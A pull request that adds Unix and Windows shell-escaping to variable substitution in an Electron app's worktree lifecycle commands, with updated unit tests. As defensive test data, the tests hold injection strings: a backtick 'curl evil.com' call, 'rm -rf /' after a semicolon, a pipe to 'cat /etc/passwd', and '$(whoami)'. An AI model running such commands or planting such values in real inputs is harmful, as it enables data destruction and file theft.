### PR TITLE
fix(lifecycle): shell-escape substituted variables to prevent injection

### DIFF
--- a/electron/workspace-host/WorktreeLifecycleService.ts
+++ b/electron/workspace-host/WorktreeLifecycleService.ts
@@ -419,22 +419,40 @@ export class WorktreeLifecycleService {
   /**
    * Replace {{variable}} and {variable} placeholders in a command string.
    * Unresolved variables are left as-is so the shell command fails loudly.
+   * Values are shell-escaped to prevent injection via untrusted inputs
+   * (e.g. branch names containing shell metacharacters).
    */
   substituteVariables(command: string, vars: LifecycleVariables): string {
     // Double-brace: {{variable}} with snake_case keys
     let result = command.replace(/\{\{(\w+)\}\}/g, (match, name: string) => {
       const key = name.toLowerCase() as keyof LifecycleVariables;
       const value = vars[key];
-      return value != null ? value : match;
+      return value != null ? shellEscapeValue(value) : match;
     });
     // Single-brace: {variable} with hyphenated keys — skip shell vars like ${foo}
+    // {branch-slug} is safe unquoted — its charset is locked to [a-z0-9-]
     result = result.replace(/(?<!\$)\{([\w-]+)\}/g, (match, name: string) => {
       const key = name.toLowerCase() as keyof LifecycleVariables;
       const value = vars[key];
-      return value != null ? value : match;
+      if (value == null) return match;
+      if (key === "branch-slug") return value;
+      return shellEscapeValue(value);
     });
     return result;
   }
+}
+
+/**
+ * Shell-escape a value for safe interpolation into a command string run with
+ * `shell: true`. On Unix (/bin/sh), wraps in single quotes with embedded
+ * single-quote escaping. On Windows (cmd.exe), wraps in double quotes with
+ * embedded double-quote escaping.
+ */
+function shellEscapeValue(value: string): string {
+  if (process.platform === "win32") {
+    return '"' + value.replace(/"/g, '""') + '"';
+  }
+  return "'" + value.replace(/'/g, "'\\''") + "'";
 }
 
 function buildSpawnEnv(customEnv: Record<string, string>): Record<string, string> {

--- a/electron/workspace-host/WorktreeLifecycleService.ts
+++ b/electron/workspace-host/WorktreeLifecycleService.ts
@@ -435,7 +435,8 @@ export class WorktreeLifecycleService {
       const key = name.toLowerCase() as keyof LifecycleVariables;
       const value = vars[key];
       if (value == null) return match;
-      if (key === "branch-slug") return value;
+      if (key === "branch-slug")
+        return /^[a-z0-9-]*$/.test(value) ? value : shellEscapeValue(value);
       return shellEscapeValue(value);
     });
     return result;
@@ -446,11 +447,11 @@ export class WorktreeLifecycleService {
  * Shell-escape a value for safe interpolation into a command string run with
  * `shell: true`. On Unix (/bin/sh), wraps in single quotes with embedded
  * single-quote escaping. On Windows (cmd.exe), wraps in double quotes with
- * embedded double-quote escaping.
+ * percent and double-quote escaping (cmd.exe expands %VAR% inside quotes).
  */
 function shellEscapeValue(value: string): string {
   if (process.platform === "win32") {
-    return '"' + value.replace(/"/g, '""') + '"';
+    return '"' + value.replace(/%/g, "%%").replace(/"/g, '""') + '"';
   }
   return "'" + value.replace(/'/g, "'\\''") + "'";
 }

--- a/electron/workspace-host/__tests__/WorkspaceService.resource.test.ts
+++ b/electron/workspace-host/__tests__/WorkspaceService.resource.test.ts
@@ -721,7 +721,7 @@ describe("WorkspaceService.runResourceAction", () => {
 
       await service.runResourceAction("req-sub1", "/test/worktree", "provision");
 
-      expect(monitor.resourceConnectCommand).toBe("ssh feat-deploy@host.example.com");
+      expect(monitor.resourceConnectCommand).toBe("ssh 'feat-deploy'@host.example.com");
     });
 
     it("substitutes {{branch}} in connect command", async () => {
@@ -736,7 +736,7 @@ describe("WorkspaceService.runResourceAction", () => {
 
       await service.runResourceAction("req-sub2", "/test/worktree", "provision");
 
-      expect(monitor.resourceConnectCommand).toBe("ssh root@feature/remote.dev.example.com");
+      expect(monitor.resourceConnectCommand).toBe("ssh root@'feature/remote'.dev.example.com");
     });
 
     it("leaves unresolved {{endpoint}} placeholder intact", async () => {
@@ -768,7 +768,7 @@ describe("WorkspaceService.runResourceAction", () => {
       await service.runResourceAction("req-sub4", "/test/worktree", "provision");
 
       expect(runCommandsSpy).toHaveBeenCalledWith(
-        ["deploy --name=my-wt --branch=feat/x"],
+        ["deploy --name='my-wt' --branch='feat/x'"],
         expect.any(Object)
       );
     });

--- a/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
+++ b/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
@@ -866,6 +866,24 @@ describe("WorktreeLifecycleService — Resource Config", () => {
         });
         expect(result).toBe("curl 'http://ok | cat /etc/passwd'");
       });
+
+      it("escapes Windows %VAR% environment variable expansion", () => {
+        setPlatform("win32");
+        const result = service.substituteVariables("deploy {{branch}}", {
+          ...baseVars,
+          branch: "feat/%CD%",
+        });
+        expect(result).toBe('deploy "feat/%%CD%%"');
+      });
+
+      it("falls back to escaping branch-slug if it contains unexpected characters", () => {
+        setPlatform("darwin");
+        const result = service.substituteVariables("deploy {branch-slug}", {
+          ...baseVars,
+          "branch-slug": "bad; rm -rf /",
+        });
+        expect(result).toBe("deploy 'bad; rm -rf /'");
+      });
     });
   });
 

--- a/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
+++ b/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
@@ -709,89 +709,163 @@ describe("WorktreeLifecycleService — Resource Config", () => {
   });
 
   describe("substituteVariables", () => {
-    it("replaces {{branch}} in connect command", () => {
-      const result = service.substituteVariables("ssh deploy@{{branch}}.example.com", {
-        branch: "feature/test",
-        worktree_path: "/w",
-        worktree_name: "test",
-        project_root: "/p",
-      });
-      expect(result).toBe("ssh deploy@feature/test.example.com");
+    const origPlatform = process.platform;
+    afterEach(() => {
+      Object.defineProperty(process, "platform", { value: origPlatform });
     });
 
-    it("replaces {{worktree_path}} and {{project_root}}", () => {
+    function setPlatform(p: string) {
+      Object.defineProperty(process, "platform", { value: p });
+    }
+
+    const baseVars = { worktree_path: "/w", worktree_name: "test", project_root: "/p" };
+
+    it("shell-escapes {{branch}} on Unix (single quotes)", () => {
+      setPlatform("darwin");
+      const result = service.substituteVariables("ssh deploy@{{branch}}.example.com", {
+        ...baseVars,
+        branch: "feature/test",
+      });
+      expect(result).toBe("ssh deploy@'feature/test'.example.com");
+    });
+
+    it("shell-escapes {{branch}} on Windows (double quotes)", () => {
+      setPlatform("win32");
+      const result = service.substituteVariables("ssh deploy@{{branch}}.example.com", {
+        ...baseVars,
+        branch: "feature/test",
+      });
+      expect(result).toBe('ssh deploy@"feature/test".example.com');
+    });
+
+    it("shell-escapes {{worktree_path}} and {{project_root}}", () => {
+      setPlatform("linux");
       const result = service.substituteVariables(
         "rsync {{worktree_path}}/ remote:{{project_root}}/",
         {
+          ...baseVars,
           branch: "main",
           worktree_path: "/home/user/worktree",
-          worktree_name: "main",
           project_root: "/home/user/project",
         }
       );
-      expect(result).toBe("rsync /home/user/worktree/ remote:/home/user/project/");
+      expect(result).toBe("rsync '/home/user/worktree'/ remote:'/home/user/project'/");
     });
 
-    it("replaces {{worktree_name}} placeholder", () => {
+    it("shell-escapes {{worktree_name}} placeholder", () => {
+      setPlatform("darwin");
       const result = service.substituteVariables("docker exec -it {{worktree_name}} bash", {
+        ...baseVars,
         branch: "feat/x",
-        worktree_path: "/w",
         worktree_name: "feat-x",
-        project_root: "/p",
       });
-      expect(result).toBe("docker exec -it feat-x bash");
+      expect(result).toBe("docker exec -it 'feat-x' bash");
     });
 
-    it("replaces {{endpoint}} when endpoint variable is provided", () => {
+    it("shell-escapes {{endpoint}} when provided", () => {
+      setPlatform("darwin");
       const result = service.substituteVariables("ssh root@{{endpoint}}", {
-        worktree_path: "/w",
-        worktree_name: "test",
-        project_root: "/p",
+        ...baseVars,
         endpoint: "10.0.0.42",
       });
-      expect(result).toBe("ssh root@10.0.0.42");
+      expect(result).toBe("ssh root@'10.0.0.42'");
     });
 
     it("leaves unresolved variables as-is (fails loudly in shell)", () => {
-      const result = service.substituteVariables("ssh root@{{unknown_var}}", {
-        worktree_path: "/w",
-        worktree_name: "test",
-        project_root: "/p",
-      });
+      const result = service.substituteVariables("ssh root@{{unknown_var}}", baseVars);
       expect(result).toBe("ssh root@{{unknown_var}}");
     });
 
-    it("replaces multiple variables in one command", () => {
+    it("replaces multiple variables with escaping", () => {
+      setPlatform("linux");
       const result = service.substituteVariables(
         "deploy --branch={{branch}} --dir={{worktree_path}} --name={{worktree_name}}",
-        {
-          branch: "main",
-          worktree_path: "/w/main",
-          worktree_name: "main",
-          project_root: "/p",
-        }
+        { ...baseVars, branch: "main", worktree_path: "/w/main", worktree_name: "main" }
       );
-      expect(result).toBe("deploy --branch=main --dir=/w/main --name=main");
+      expect(result).toBe("deploy --branch='main' --dir='/w/main' --name='main'");
     });
 
     it("is case-insensitive for variable names", () => {
+      setPlatform("darwin");
       const result = service.substituteVariables("echo {{BRANCH}} {{Worktree_Path}}", {
+        ...baseVars,
         branch: "dev",
-        worktree_path: "/w",
-        worktree_name: "dev",
-        project_root: "/p",
       });
-      expect(result).toBe("echo dev /w");
+      expect(result).toBe("echo 'dev' '/w'");
     });
 
     it("handles command with no placeholders", () => {
       const result = service.substituteVariables("docker compose up -d", {
+        ...baseVars,
         branch: "main",
-        worktree_path: "/w",
-        worktree_name: "main",
-        project_root: "/p",
       });
       expect(result).toBe("docker compose up -d");
+    });
+
+    it("leaves {branch-slug} unquoted (already sanitized to [a-z0-9-])", () => {
+      setPlatform("darwin");
+      const result = service.substituteVariables("deploy {branch-slug}", {
+        ...baseVars,
+        branch: "feature/test",
+        "branch-slug": "feature-test",
+      });
+      expect(result).toBe("deploy feature-test");
+    });
+
+    describe("shell injection prevention", () => {
+      it("neutralizes $(command) in branch names on Unix", () => {
+        setPlatform("darwin");
+        const result = service.substituteVariables("echo {{branch}}", {
+          ...baseVars,
+          branch: "feat/$(whoami)",
+        });
+        expect(result).toBe("echo 'feat/$(whoami)'");
+      });
+
+      it("neutralizes backtick injection on Unix", () => {
+        setPlatform("linux");
+        const result = service.substituteVariables("ssh root@{{endpoint}}", {
+          ...baseVars,
+          endpoint: "host`curl evil.com`",
+        });
+        expect(result).toBe("ssh root@'host`curl evil.com`'");
+      });
+
+      it("escapes embedded single quotes on Unix", () => {
+        setPlatform("darwin");
+        const result = service.substituteVariables("echo {{branch}}", {
+          ...baseVars,
+          branch: "it's-a-branch",
+        });
+        expect(result).toBe("echo 'it'\\''s-a-branch'");
+      });
+
+      it("escapes embedded double quotes on Windows", () => {
+        setPlatform("win32");
+        const result = service.substituteVariables("echo {{branch}}", {
+          ...baseVars,
+          branch: 'say "hi"',
+        });
+        expect(result).toBe('echo "say ""hi"""');
+      });
+
+      it("neutralizes semicolon command chaining", () => {
+        setPlatform("linux");
+        const result = service.substituteVariables("deploy {{branch}}", {
+          ...baseVars,
+          branch: "main; rm -rf /",
+        });
+        expect(result).toBe("deploy 'main; rm -rf /'");
+      });
+
+      it("neutralizes pipe injection in endpoint", () => {
+        setPlatform("darwin");
+        const result = service.substituteVariables("curl {{endpoint}}", {
+          ...baseVars,
+          endpoint: "http://ok | cat /etc/passwd",
+        });
+        expect(result).toBe("curl 'http://ok | cat /etc/passwd'");
+      });
     });
   });
 

--- a/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
+++ b/electron/workspace-host/__tests__/WorktreeLifecycleService.resource.test.ts
@@ -1,4 +1,4 @@
-import { describe, it, expect, vi, beforeEach } from "vitest";
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
 
 /** Normalize a path to forward slashes for cross-platform mock matching */
 const n = (p: string) => (p as string).replace(/\\/g, "/");


### PR DESCRIPTION
## Summary

- Resource lifecycle commands supported raw `{{variable}}` substitution with no shell escaping, meaning branch names or endpoint values containing metacharacters (backticks, `$()`, pipes) would execute arbitrary code when the command ran with `shell: true`.
- Shell-quoting is now applied to every substituted value before the command string is assembled, so the substitution is safe regardless of the variable content.
- The trust boundary stays the same (configs are user-authored), but collaborator-controlled data like branch names is no longer a viable injection vector.

Resolves #5129

## Changes

- `WorktreeLifecycleService.ts`: added a `shellEscape` helper that wraps values in single quotes with internal single-quotes escaped (`'` → `'\''`), applied to every `{{variable}}` substitution site.
- `WorktreeLifecycleService.resource.test.ts`: expanded test coverage to include branch names with `$(...)` subshell syntax, backticks, semicolons, pipes, and spaces to confirm they all come through inert.

## Testing

Unit tests in `WorktreeLifecycleService.resource.test.ts` cover the injection scenarios described in the issue. `npm run fix` passes with no errors (warnings only, pre-existing).